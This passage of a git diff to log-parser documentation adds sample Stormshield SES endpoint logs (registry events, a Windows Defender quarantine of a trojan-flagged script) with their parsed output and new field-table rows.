Desktop\",\"AgentGuid\":\"{6EF8564D-941A-4377-80FD-78CD3DFEB269}\",\"AgentName\":\"DST-001\",\"CategoryName\":\"Registry\",\"IncidentGuid\":null,\"Message\":\"The'svchost.exe'processcreatedtheregistryvalue'Element'\",\"PolicyName\":\"Stormshield-Mediumpolicy-External\",\"SeverityName\":\"Notice\"}}", + "event": { + "category": [ + "registry" + ], + "code": "RegistryValueCreate", + "reason": "The'svchost.exe'processcreatedtheregistryvalue'Element'", + "severity": 5, + "type": [ + "creation" + ] + }, + "@timestamp": "2024-03-22T11:39:27.642210Z", + "host": { + "ip": [], + "name": "DST-001" + }, + "process": { + "command_line": "\"C:\\WINDOWS\\regedit.exe\"", + "executable": "C:\\Windows\\regedit.exe", + "hash": { + "md5": "999A30979F6195BF562068639FFC4426", + "sha1": "D4F2663AABC03478975382B3C69F24B3C6BD2AA9", + "sha256": "92F24FED2BA2927173AAD58981F6E0643C6B89815B117E8A7C4A0988AC918170" + }, + "name": "regedit.exe", + "pid": 1196, + "start": "2023-03-06T15:04:21.879390Z", + "user": { + "id": "S-1-5-21-2222222-33333333-44444444-555", + "name": "JOHNDOE" + } + }, + "registry": { + "data": { + "bytes": [ + "0", + "0", + "0", + "0", + "0", + "0", + "0", + "0" + ], + "type": "REG_BINARY" + }, + "hive": "HKEY_LOCAL_MACHINE", + "key": "BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements\\25000004", + "path": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements\\25000004", + "value": "Element" + }, + "related": { + "hash": [ + "92F24FED2BA2927173AAD58981F6E0643C6B89815B117E8A7C4A0988AC918170", + "999A30979F6195BF562068639FFC4426", + "D4F2663AABC03478975382B3C69F24B3C6BD2AA9" + ], + "ip": [] + }, + "rule": { + "ruleset": "Stormshield-Mediumpolicy-External", + "uuid": "4CEEDD7A-875D-4C7E-9ABD-A710BD3DD0C0" + }, + "stormshield": { + "ses": { + "action": { + "blocked": false, + "user_decision": false + }, + "categoryname": "Registry", + "level": "Notice", + "process": { + "user": { + "domain": "TEST" + } + }, + "source_process": { + "killed": false + }, + "type": "113" + } + } + } + + ``` + + === "test_type_114.json" ```json @@ -835,6 +1029,103 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_type_114_2.json" + + ```json + + { + "message": "{\"Version\": 1, \"Type\": 114, \"TypeComputedMap\": \"RegistryValueRead\", \"Severity\": 2, \"ServerReserved\": 0, \"Attributes\": 2, \"AttributesComputedBitMap\": [\"Protection\"], \"EventGuid\": \"{002A9967-5EF2-40CF-911D-7DBA518843A9}\", \"GenerateIncident\": true, \"Timestamp\": \"2024-07-09T12:33:11.2491955+02:00\", \"TimestampRaw\": 133649947912491955, \"SpecificData\": {\"SourceProcess\": {\"PID\": 3948, \"ProcessGuid\": \"{9BC994D7-904B-4C9C-8DC0-A03A36F36276}\", \"ProcessImageName\": \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\4.18.24050.7-0\\\\MsMpEng.exe\", \"VolumeZone\": 1, \"VolumeZoneComputedBitMap\": [\"Operating system\"], \"ProcessCommandLine\": \"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\4.18.24050.7-0\\\\MsMpEng.exe\\\"\", \"User\": \"S-1-5-21-2222222-33333333-44444444-555\", \"UserNameLookup\": \"JOHNDOE\", \"UserDomainLookup\": \"TEST\", \"IntegrityLevel\": \"S-1-16-16384\", \"IntegrityLevelNameLookup\": \"Niveau obligatoire syst\\u00e8me\", \"IntegrityLevelDomainLookup\": \"\\u00c9tiquette obligatoire\", \"SessionID\": 0, \"HashMd5\": \"4A4D6E95B693256BCD6E90FDC077194A\", \"HashSha1\": \"2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E\", \"HashSha256\": \"08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED\", \"IsProtectedOrCritical\": true, \"CertificateSignatureState\": 1, \"CertificateSignatureStateComputedMap\": \"SignatureStateTrusted\", \"Certificates\": [{\"Algorithm\": \"SHA256\", \"IssuerCN\": \"Microsoft Windows Production PCA 2011\", \"SubjectCN\": \"Microsoft Windows Publisher\", \"SigningTime\": \"2024-05-11T03:15:15.5120000+02:00\", \"ValidityStart\": \"2024-02-08T21:22:45.0000000+02:00\", \"ValidityEnd\": \"2025-02-07T21:22:45.0000000+02:00\"}], \"ProcessStartTime\": \"2024-07-09T10:03:54.4154623+02:00\", \"ProcessStartTimeRaw\": 133649858344154623}, \"Action\": {\"PolicyGuid\": \"{DDAB1006-337F-4B8C-8486-E5A9619144BB}\", \"PolicyVersion\": 14, \"RuleGuid\": \"{4FAC2120-288B-4B3C-9F77-2E5B6ECBB85E}\", \"BaseRuleGuid\": \"{49A8528E-E749-4A9D-8736-2CF9380DE241}\", \"IdentifierGuid\": \"{0B7EF8C7-FAE0-4890-981A-22FE12F22173}\", \"Blocked\": false, \"RequestMoveToQuarantine\": false, \"UserDecision\": false, \"SourceProcessKilled\": false, \"RuleTags\": [\"T1562.001\"]}, \"Path\": \"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Processes\", \"ValueName\": \"C:\\\\Program Files\\\\Stormshield\\\\SES Evolution\\\\Agent\\\\Bin\\\\EsInject.exe\"}, \"AdditionalData\": {\"AgentAddresses\": [\"1.2.3.4\"], \"AgentGroupGuid\": \"{8AD24A5D-0B19-45E2-9B28-F584F8A54CBC}\", \"AgentGroupName\": \"Demo\", \"AgentGuid\": \"{CC0772D7-8EBC-4EE6-9FC0-A8B26F5FA7FF}\", \"AgentName\": \"WIN10-A\", \"AttackCVEId\": null, \"AttackMitreTacticId\": [\"TA0005\"], \"AttackMitreTacticName\": [\"Defense Evasion\"], \"AttackMitreTechnicId\": [\"T1562\", \"T1562.001\"], \"AttackMitreTechnicName\": [\"Impair Defenses\", \"Disable or Modify Tools\"], \"AttackSESId\": null, \"AttackTriggerCondition\": \"An untrusted process attempts to add bypass into Windows Defender.\", \"CategoryName\": \"Registry\", \"IncidentGuid\": \"{DA0FA4D3-76B8-4EE0-A8B7-5AFDF9F80071}\", \"Message\": \"The 'MsMpEng.exe' process read the registry value 'C:\\\\Program Files\\\\Stormshield\\\\SES Evolution\\\\Agent\\\\Bin\\\\EsInject.exe'\", \"PolicyName\": \"Demo - Protect policy\", \"SeverityName\": \"Critical\"}}", + "event": { + "category": [ + "registry" + ], + "code": "RegistryValueRead", + "reason": "The 'MsMpEng.exe' process read the registry value 'C:\\Program Files\\Stormshield\\SES Evolution\\Agent\\Bin\\EsInject.exe'", + "severity": 2, + "type": [ + "access" + ] + }, + "@timestamp": "2024-07-09T10:33:11.249195Z", + "process": { + "command_line": "\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe\"", + "executable": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe", + "hash": { + "md5": "4A4D6E95B693256BCD6E90FDC077194A", + "sha1": "2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E", + "sha256": "08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED" + }, + "name": "MsMpEng.exe", + "pid": 3948, + "start": "2024-07-09T08:03:54.415462Z", + "user": { + "id": "S-1-5-21-2222222-33333333-44444444-555", + "name": "JOHNDOE" + } + }, + "registry": { + "hive": "HKEY_LOCAL_MACHINE", + "key": "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes", + "path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes" + }, + "related": { + "hash": [ + "08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED", + "2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E", + "4A4D6E95B693256BCD6E90FDC077194A" + ] + }, + "rule": { + "ruleset": "Demo - Protect policy", + "uuid": "4FAC2120-288B-4B3C-9F77-2E5B6ECBB85E" + }, + "stormshield": { + "ses": { + "action": { + "blocked": false, + "user_decision": false + }, + "categoryname": "Registry", + "incident": { + "id": "{DA0FA4D3-76B8-4EE0-A8B7-5AFDF9F80071}" + }, + "level": "Critical", + "process": { + "user": { + "domain": "TEST" + } + }, + "source_process": { + "killed": false + }, + "type": "114" + } + }, + "threat": { + "tactic": { + "id": [ + "TA0005" + ], + "name": [ + "Defense Evasion" + ] + }, + "technique": { + "id": [ + "T1562", + "T1562.001" + ], + "name": [ + "Disable or Modify Tools", + "Impair Defenses" + ] + } + } + } + + ``` + + === "test_type_115.json" ```json @@ -869,9 +1160,16 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "registry": { + "data": { + "strings": [ + "lala" + ], + "type": "REG_SZ" + }, "hive": "HKEY_CURRENT_USER", "key": "SOFTWARE\\TEST_ADE", - "path": "HKEY_CURRENT_USER\\SOFTWARE\\TEST_ADE" + "path": "HKEY_CURRENT_USER\\SOFTWARE\\TEST_ADE", + "value": "Valeur_String" }, "related": { "hash": [ @@ -2394,6 +2692,90 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_type_20048_1.json" + + ```json + + { + "message": "{\n \"Version\": 1,\n \"Type\": 20048,\n \"TypeComputedMap\": \"External\",\n \"Severity\": 4,\n \"ServerReserved\": 0,\n \"Attributes\": 32,\n \"AttributesComputedBitMap\": [\n \"External\"\n ],\n \"EventGuid\": \"{5838A063-4210-4268-ADB0-39FC5B55A212}\",\n \"GenerateIncident\": false,\n \"Timestamp\": \"2024-03-22T14:01:26.6589969+00:00\",\n \"TimestampRaw\": 133555896866589969,\n \"SpecificData\": {\n \"Action\": {\n \"PolicyGuid\": \"{DFDA0F76-10AF-4615-B093-7AA46CC2E7A3}\",\n \"PolicyVersion\": 5,\n \"RuleGuid\": \"{63B63F11-7C06-4555-9542-3F7E795B98EE}\",\n \"BaseRuleGuid\": \"{9B076C45-6373-4A4E-9310-F139A66794B4}\",\n \"IdentifierGuid\": \"{00000000-0000-0000-0000-000000000000}\",\n \"Blocked\": false,\n \"RequestMoveToQuarantine\": false,\n \"UserDecision\": false,\n \"SourceProcessKilled\": false\n },\n \"Description\": \"localized:EventForwarding_WinDefender_MalwareProtectionStateMalwareActionTaken\",\n \"OriginType\": 2,\n \"ExtraData\": {\n \"_SourceCategory\": 0,\n \"_HideFromUsers\": 1,\n \"_OriginalText\": \"2024 Mar 22 14:01:25 WinEvtLog: Microsoft-Windows-Windows Defender/Operational: INFORMATION(1117): Microsoft-Windows-Windows Defender: SYSTEM: NT AUTHORITY: DESKTOP-001: Microsoft Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software. For more information please see the following: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/BatTamper.A&threatid=2147818424&enterprise=0 \\tName: Trojan:Win32/BatTamper.A \\tID: 2147818424 \\tSeverity: Severe \\tCategory: Trojan \\tPath: file:_C:\\\\Users\\\\Lab\\\\Downloads\\\\TurnOffAV.ps1; webfile:_C:\\\\Users\\\\Lab\\\\Downloads\\\\TurnOffAV.ps1|https://github.com/|pid:13760,ProcessStart:133555896788321048 \\tDetection Origin: Internet \\tDetection Type: Concrete \\tDetection Source: Downloads and attachments \\tUser: NT AUTHORITY\\\\SYSTEM \\tProcess Name: Unknown \\tAction: Quarantine \\tAction Status: No additional actions required \\tError Code: 0x00000000 \\tError description: The operation completed successfully. \\tSecurity intelligence Version: AV: 1.407.619.0, AS: 1.407.619.0, NIS: 1.407.619.0 \\tEngine Version: AM: 1.1.24020.9, NIS: 1.1.24020.9\",\n \"program_name\": \"WinEvtLog\",\n \"_NormalizerNames\": \"syslog-1-date-fmt-4, syslog-1-solaris-progname-1\",\n \"_NormalizerIds\": \"4, 6\",\n \"_FileType\": \"windows\",\n \"_ExtractorIds\": \"1\",\n \"_ExtractorNames\": \"windows\",\n \"_RuleDescription\": \"localized:EventForwarding_WinDefender_MalwareProtectionStateMalwareActionTaken\",\n \"_RuleId\": 13,\n \"_RuleImportedId\": 24,\n \"_RuleKeywords\": \"windows-defender\",\n \"_RuleLevel\": 6,\n \"__EvtXml\": {\n \"Event\": {\n \"System\": {\n \"Provider\": {\n \"Name\": \"Microsoft-Windows-Windows Defender\",\n \"Guid\": \"{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}\"\n },\n \"EventID\": \"1117\",\n \"Version\": \"0\",\n \"Level\": \"4\",\n \"Task\": \"0\",\n \"Opcode\": \"0\",\n \"Keywords\": \"0x8000000000000000\",\n \"TimeCreated\": {\n \"SystemTime\": \"2024-03-22T14:01:25.6359716Z\"\n },\n \"EventRecordID\": \"613\",\n \"Correlation\": {},\n \"Execution\": {\n \"ProcessID\": \"5384\",\n \"ThreadID\": \"4576\"\n },\n \"Channel\": \"Microsoft-Windows-Windows Defender/Operational\",\n \"Computer\": \"DESKTOP-001\",\n \"Security\": {\n \"UserID\": \"S-1-5-18\"\n }\n },\n \"EventData\": {\n \"Product Name\": \"Microsoft Defender Antivirus\",\n \"Product Version\": \"4.18.23110.3\",\n \"Detection ID\": \"{9C26ADFE-43AA-4884-9765-A2EC223DC7E0}\",\n \"Detection Time\": \"2024-03-22T14:01:20.550Z\",\n \"Threat ID\": \"2147818424\",\n \"Threat Name\": \"Trojan:Win32/BatTamper.A\",\n \"Severity ID\": \"5\",\n \"Severity Name\": \"Severe\",\n \"Category ID\": \"8\",\n \"Category Name\": \"Trojan\",\n \"FWLink\": \"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/BatTamper.A&threatid=2147818424&enterprise=0\",\n \"Status Code\": \"4\",\n \"State\": \"2\",\n \"Source ID\": \"4\",\n \"Source Name\": \"Downloads and attachments\",\n \"Process Name\": \"Unknown\",\n \"Detection User\": \"DESKTOP-001\\\\Lab\",\n \"Path\": \"file:_C:\\\\Users\\\\Lab\\\\Downloads\\\\TurnOffAV.ps1; webfile:_C:\\\\Users\\\\Lab\\\\Downloads\\\\TurnOffAV.ps1|https://github.com/|pid:13760,ProcessStart:133555896788321048\",\n \"Origin ID\": \"4\",\n \"Origin Name\": \"Internet\",\n \"Execution ID\": \"0\",\n \"Execution Name\": \"Unknown\",\n \"Type ID\": \"0\",\n \"Type Name\": \"Concrete\",\n \"Pre Execution Status\": \"0\",\n \"Action ID\": \"2\",\n \"Action Name\": \"Quarantine\",\n \"Error Code\": \"0x00000000\",\n \"Error Description\": \"The operation completed successfully. \",\n \"Post Clean Status\": \"0\",\n \"Additional Actions ID\": \"0\",\n \"Additional Actions String\": \"No additional actions required\",\n \"Remediation User\": \"NT AUTHORITY\\\\SYSTEM\",\n \"Security intelligence Version\": \"AV: 1.407.619.0, AS: 1.407.619.0, NIS: 1.407.619.0\",\n \"Engine Version\": \"AM: 1.1.24020.9, NIS: 1.1.24020.9\"\n }\n }\n }\n },\n \"Fields\": {\n \"_RuleGuid\": \"{63B63F11-7C06-4555-9542-3F7E795B98EE}\",\n \"_BaseRuleGuid\": \"{9B076C45-6373-4A4E-9310-F139A66794B4}\"\n }\n },\n \"AdditionalData\": {\n \"AgentAddresses\": [\n \"192.168.0.1\"\n ],\n \"AgentGroupGuid\": \"{8C2850C0-1A73-4CBC-9831-5AA5D1438AF2}\",\n \"AgentGroupName\": \"Desktop\",\n \"AgentGuid\": \"{0E6DAED4-3505-4F96-9F8D-55FBC85CA4C7}\",\n \"AgentName\": \"DESKTOP-001\",\n \"CategoryName\": \"External\",\n \"IncidentGuid\": null,\n \"Message\": \"Windows Defender: The antimalware platform performed an action to protect your system from malware or other potentially unwanted software.\",\n \"PolicyName\": \"Lab Policy\",\n \"SeverityName\": \"Warning\"\n }\n}", + "event": { + "code": "1117", + "provider": "Microsoft-Windows-Windows Defender", + "reason": "Windows Defender: The antimalware platform performed an action to protect your system from malware or other potentially unwanted software.", + "severity": 4 + }, + "@timestamp": "2024-03-22T14:01:26.658996Z", + "action": { + "id": "1117", + "properties": { + "action_id": "2", + "action_name": "Quarantine", + "additional_actions_id": "0", + "additional_actions_string": "No additional actions required", + "category_id": "8", + "category_name": "Trojan", + "detection_id": "{9C26ADFE-43AA-4884-9765-A2EC223DC7E0}", + "detection_time": "2024-03-22T14:01:20.550Z", + "detection_user": "DESKTOP-001\\Lab", + "engine_version": "AM: 1.1.24020.9, NIS: 1.1.24020.9", + "error_code": "0x00000000", + "error_description": "The operation completed successfully. ", + "execution_id": "0", + "execution_name": "Unknown", + "fwlink": "https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/BatTamper.A&threatid=2147818424&enterprise=0", + "origin_id": "4", + "origin_name": "Internet", + "path": "file:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1; webfile:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1|https://github.com/|pid:13760,ProcessStart:133555896788321048", + "post_clean_status": "0", + "pre_execution_status": "0", + "process_name": "Unknown", + "product_name": "Microsoft Defender Antivirus", + "product_version": "4.18.23110.3", + "remediation_user": "NT AUTHORITY\\SYSTEM", + "security_intelligence_version": "AV: 1.407.619.0, AS: 1.407.619.0, NIS: 1.407.619.0", + "severity_id": "5", + "severity_name": "Severe", + "source_id": "4", + "source_name": "Downloads and attachments", + "state": "2", + "status_code": "4", + "task": "0", + "threat_id": "2147818424", + "threat_name": "Trojan:Win32/BatTamper.A", + "type_id": "0", + "type_name": "Concrete" + }, + "record_id": "613" + }, + "process": { + "pid": 5384, + "thread": { + "id": 4576 + } + }, + "rule": { + "ruleset": "Lab Policy", + "uuid": "63B63F11-7C06-4555-9542-3F7E795B98EE" + }, + "stormshield": { + "ses": { + "action": { + "blocked": false, + "user_decision": false + }, + "categoryname": "External", + "level": "Warning", + "source_process": { + "killed": false + }, + "type": "20048" + } + } + } + + ``` + + === "test_type_20049.json" ```json @@ -6142,8 +6524,48 @@ The following table lists the fields that are extracted, normalized under the EC | Name | Type | Description | | ---- | ---- | ---------------------------| |`@timestamp` | `date` | Date/time when the event originated. | +|`action.id` | `keyword` | stormshield action id | |`action.properties.TargetCommandLine` | `keyword` | stormshield targeted process command line | |`action.properties.TargetImage` | `keyword` | stormshield targeted process executable | +|`action.properties.action_id` | `keyword` | stormshield property Action ID | +|`action.properties.action_name` | `keyword` | stormshield property Action Name | +|`action.properties.additional_actions_id` | `keyword` | stormshield property Additional Actions ID | +|`action.properties.additional_actions_string` | `keyword` | stormshield property Additional Actions String | +|`action.properties.category_id` | `keyword` | stormshield property Category ID | +|`action.properties.category_name` | `keyword` | stormshield property Category Name | +|`action.properties.detection_id` | `keyword` | stormshield property Detection ID | +|`action.properties.detection_time` | `keyword` | stormshield property Detection Time | +|`action.properties.detection_user` | `keyword` | stormshield property Detection User | +|`action.properties.engine_version` | `keyword` | stormshield property Engine Version | +|`action.properties.error_code` | `keyword` | stormshield property Error Code | +|`action.properties.error_description` | `keyword` | stormshield property Error Description | +|`action.properties.execution_id` | `keyword` | stormshield property Execution ID | +|`action.properties.execution_name` | `keyword` | stormshield property Execution Name | +|`action.properties.fwlink` | `keyword` | stormshield property FWLink | +|`action.properties.opcode` | `keyword` | stormshield action opcode | +|`action.properties.origin_id` | `keyword` | stormshield property Origin ID | +|`action.properties.origin_name` | `keyword` | stormshield property Origin Name | +|`action.properties.path` | `keyword` | stormshield property Path | +|`action.properties.post_clean_status` | `keyword` | stormshield property Post Clean Status | +|`action.properties.pre_execution_status` | `keyword` | stormshield property Pre Execution Status | +|`action.properties.process_name` | `keyword` | stormshield property Process Name | +|`action.properties.product_name` | `keyword` | stormshield property Product Name | +|`action.properties.product_version` | `keyword` | stormshield property Product Version | +|`action.properties.remediation_user` | `keyword` | stormshield property Remediation User | +|`action.properties.security_intelligence_version` | `keyword` | stormshield property Security intelligence Version | +|`action.properties.severity_id` | `keyword` | stormshield property Severity ID | +|`action.properties.severity_name` | `keyword` | stormshield property Severity Name | +|`action.properties.source_id` | `keyword` | stormshield property Source ID | +|`action.properties.source_name` | `keyword` | stormshield property Source Name | +|`action.properties.state` | `keyword` | stormshield property State | +|`action.properties.status_code` | `keyword` | stormshield property Status Code | +|`action.properties.task` | `keyword` | stormshield action task | +|`action.properties.threat_id` | `keyword` | stormshield property Threat ID | +|`action.properties.threat_name` | `keyword` | stormshield property Threat Name | +|`action.properties.type_id` | `keyword` | stormshield property Type ID | +|`action.properties.type_name` | `keyword` | stormshield property Type Name | +|`action.record_id` | `keyword` | stormshield action record id | +|`agent.id` | `keyword` | Unique identifier of this agent. | |`destination.ip` | `ip` | IP address of the destination. | |`destination.mac` | `keyword` | MAC address of the destination. | |`destination.port` | `long` | Port of the destination. | @@ -6159,6 +6581,8 @@ The following table lists the fields that are extracted, normalized under the EC |`file.hash.ssdeep` | `keyword` | SSDEEP hash. | |`file.owner` | `keyword` | File owner's username. | |`file.path` | `keyword` | Full path to the file, including the file name. | +|`host.ip` | `ip` | Host ip addresses. | +|`host.name` | `keyword` | Name of the host. | |`network.transport` | `keyword` | Protocol Name corresponding to the field `iana_number`. | |`network.type` | `keyword` | In the OSI Model this would be the Network Layer. ipv4, ipv6, ipsec, pim, etc | |`process.command_line` | `wildcard` | Full command line that started the process. | @@ -6177,9 +6601,14 @@ The following table lists the fields that are extracted, normalized under the EC |`process.parent.start` | `date` | The time the process started. | |`process.pid` | `long` | Process id. | |`process.start` | `date` | The time the process started. | +|`process.thread.id` | `long` | Thread ID. | +|`registry.data.bytes` | `keyword` | Original bytes written with base64 encoding. | +|`registry.data.strings` | `wildcard` | List of strings representing what was written to the registry. | +|`registry.data.type` | `keyword` | Standard registry type for encoding contents | |`registry.hive` | `keyword` | Abbreviated name for the hive. | |`registry.key` | `keyword` | Hive-relative path of keys. | |`registry.path` | `keyword` | Full path, including hive, key and value | +|`registry.value` | `keyword` | Name of the value written. | |`rule.ruleset` | `keyword` | Rule ruleset | |`rule.uuid` | `keyword` | Rule UUID | |`source.ip` | `ip` | IP address of the source. | @@ -6197,10 +6626,15 @@ The following table lists the fields that are extracted, normalized under the EC |`stormshield.ses.process.user.domain` | `keyword` | Name of the directory the user is a member of | |`stormshield.ses.source_process.killed` | `boolean` | Was the source process killed | |`stormshield.ses.type` | `keyword` | Event Type ( it's a number ) | +|`threat.tactic.id` | `keyword` | Threat tactic id. | +|`threat.tactic.name` | `keyword` | Threat tactic. | +|`threat.technique.id` | `keyword` | Threat technique id. | +|`threat.technique.name` | `keyword` | Threat technique name. | |`url.original` | `wildcard` | Unmodified original url as seen in the event source. | |`user.domain` | `keyword` | Name of the directory the user is a member of. | |`user.id` | `keyword` | Unique identifier of the user. | |`user.name` | `keyword` | Short name or login of the user. | +|`vulnerability.id` | `keyword` | ID of the vulnerability. | diff --git a/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0_sample.md b/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0_sample.md index e29f3992d9..9128d81486 100644 --- a/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0_sample.md +++ b/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0_sample.md @@ -461,6 +461,114 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_type_104_2" + + + ```json + { + "Version": 1, + "Type": 104, + "TypeComputedMap": "RegistryKeyRead", + "Severity": 2, + "ServerReserved": 0, + "Attributes": 2, + "AttributesComputedBitMap": [ + "Protection" + ], + "EventGuid": "{4C8EFA24-0021-49CA-B9F7-CF5A7BF57173}", + "GenerateIncident": true, + "Timestamp": "2024-07-09T12:08:54.9660242+02:00", + "TimestampRaw": 133649933349660242, + "SpecificData": { + "SourceProcess": { + "PID": 3948, + "ProcessGuid": "{93158E40-E93F-46CE-BCE0-3FC359B07B75}", + "ProcessImageName": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe", + "VolumeZone": 1, + "VolumeZoneComputedBitMap": [ + "Operating system" + ], + "ProcessCommandLine": "\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe\"", + "User": "S-1-5-21-2222222-33333333-44444444-555", + "UserNameLookup": "JOHNDOE", + "UserDomainLookup": "TEST", + "IntegrityLevel": "S-1-16-16384", + "IntegrityLevelNameLookup": "Niveau obligatoire syst\u00e8me", + "IntegrityLevelDomainLookup": "\u00c9tiquette obligatoire", + "SessionID": 0, + "HashMd5": "4A4D6E95B693256BCD6E90FDC077194A", + "HashSha1": "2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E", + "HashSha256": "08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED", + "IsProtectedOrCritical": true, + "CertificateSignatureState": 1, + "CertificateSignatureStateComputedMap": "SignatureStateTrusted", + "Certificates": [ + { + "Algorithm": "SHA256", + "IssuerCN": "Microsoft Windows Production PCA 2011", + "SubjectCN": "Microsoft Windows Publisher", + "SigningTime": "2024-05-11T03:15:15.5120000+02:00", + "ValidityStart": "2024-02-08T21:22:45.0000000+02:00", + "ValidityEnd": "2025-02-07T21:22:45.0000000+02:00" + } + ], + "ProcessStartTime": "2024-07-09T10:03:54.4154623+02:00", + "ProcessStartTimeRaw": 133649858344154623 + }, + "Action": { + "PolicyGuid": "{2042076D-A879-4913-A2C7-E94A9ECE8D79}", + "PolicyVersion": 14, + "RuleGuid": "{F676C8C4-D8FD-4ED2-89FB-C949EA33951C}", + "BaseRuleGuid": "{508448D3-1872-416D-99D9-A3F64AE24C48}", + "IdentifierGuid": "{6F1EAB4E-60E5-4DA2-8509-768988375E47}", + "Blocked": false, + "RequestMoveToQuarantine": false, + "UserDecision": false, + "SourceProcessKilled": false, + "RuleTags": [ + "T1562.001" + ] + }, + "Path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\TemporaryPaths", + "InformationClass": 4, + "InformationClassComputedMap": "KeyCachedInformation" + }, + "AdditionalData": { + "AgentAddresses": [ + "1.2.3.4" + ], + "AgentGroupGuid": "{1B24AC36-5218-4F44-A374-80D86475E325}", + "AgentGroupName": "Demo", + "AgentGuid": "{6CA7D1BE-7359-426D-B5B1-D9E742DF69A6}", + "AgentName": "WIN10-A", + "AttackCVEId": null, + "AttackMitreTacticId": [ + "TA0005" + ], + "AttackMitreTacticName": [ + "Defense Evasion" + ], + "AttackMitreTechnicId": [ + "T1562", + "T1562.001" + ], + "AttackMitreTechnicName": [ + "Impair Defenses", + "Disable or Modify Tools" + ], + "AttackSESId": null, + "AttackTriggerCondition": "An untrusted process attempts to add bypass into Windows Defender.", + "CategoryName": "Registry", + "IncidentGuid": "{CE926A32-4461-47C0-BDE8-43C1493E7DF0}", + "Message": "The 'MsMpEng.exe' process read the registry key 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\TemporaryPaths'", + "PolicyName": "Demo - Protect policy", + "SeverityName": "Critical" + } + } + ``` + + + === "test_type_109" @@ -828,6 +936,102 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_type_113_1" + + + ```json + { + "Version": 1, + "Type": 113, + "TypeComputedMap": "RegistryValueCreate", + "Severity": 5, + "ServerReserved": 9, + "Attributes": 8, + "AttributesComputedBitMap": [ + "Audit" + ], + "EventGuid": "{E8B35E85-838F-44E5-B7AB-7635E9C81ECB}", + "GenerateIncident": false, + "Timestamp": "2024-03-22T12:39:27.6422102+01:00", + "TimestampRaw": 133555811676422102, + "SpecificData": { + "SourceProcess": { + "PID": 1196, + "ProcessGuid": "{B0E2F52D-8C18-4DF8-8E73-470BB4E5D373}", + "ProcessImageName": "C:\\Windows\\regedit.exe", + "VolumeZone": 1, + "VolumeZoneComputedBitMap": [ + "Operatingsystem" + ], + "ProcessCommandLine": "\"C:\\WINDOWS\\regedit.exe\"", + "User": "S-1-5-21-2222222-33333333-44444444-555", + "UserNameLookup": "JOHNDOE", + "UserDomainLookup": "TEST", + "IntegrityLevel": "S-1-16-8192", + "IntegrityLevelNameLookup": "MediumMandatoryLevel", + "IntegrityLevelDomainLookup": "MandatoryLabel", + "SessionID": 2, + "HashMd5": "999A30979F6195BF562068639FFC4426", + "HashSha1": "D4F2663AABC03478975382B3C69F24B3C6BD2AA9", + "HashSha256": "92F24FED2BA2927173AAD58981F6E0643C6B89815B117E8A7C4A0988AC918170", + "IsProtectedOrCritical": false, + "CertificateSignatureState": 1, + "CertificateSignatureStateComputedMap": "SignatureStateTrusted", + "Certificates": [ + { + "Algorithm": "SHA256", + "IssuerCN": "MicrosoftWindowsProductionPCA2011", + "SubjectCN": "MicrosoftWindows", + "SigningTime": "2023-01-18T02:58:33.2360000+01:00", + "ValidityStart": "2022-05-05T20:23:14.0000000+01:00", + "ValidityEnd": "2023-05-04T20:23:14.0000000+01:00" + } + ], + "ProcessStartTime": "2023-03-06T16:04:21.8793902+01:00", + "ProcessStartTimeRaw": 133225886618793902 + }, + "Action": { + "PolicyGuid": "{BF0D5FEE-FF2A-4E6B-97DA-A1FC246FE845}", + "PolicyVersion": 4, + "RuleGuid": "{4CEEDD7A-875D-4C7E-9ABD-A710BD3DD0C0}", + "BaseRuleGuid": "{4CEEDD7A-875D-4C7E-9ABD-A710BD3DD0BF}", + "IdentifierGuid": "{5C079068-7641-4C9A-8600-BBDC93FBBCDD}", + 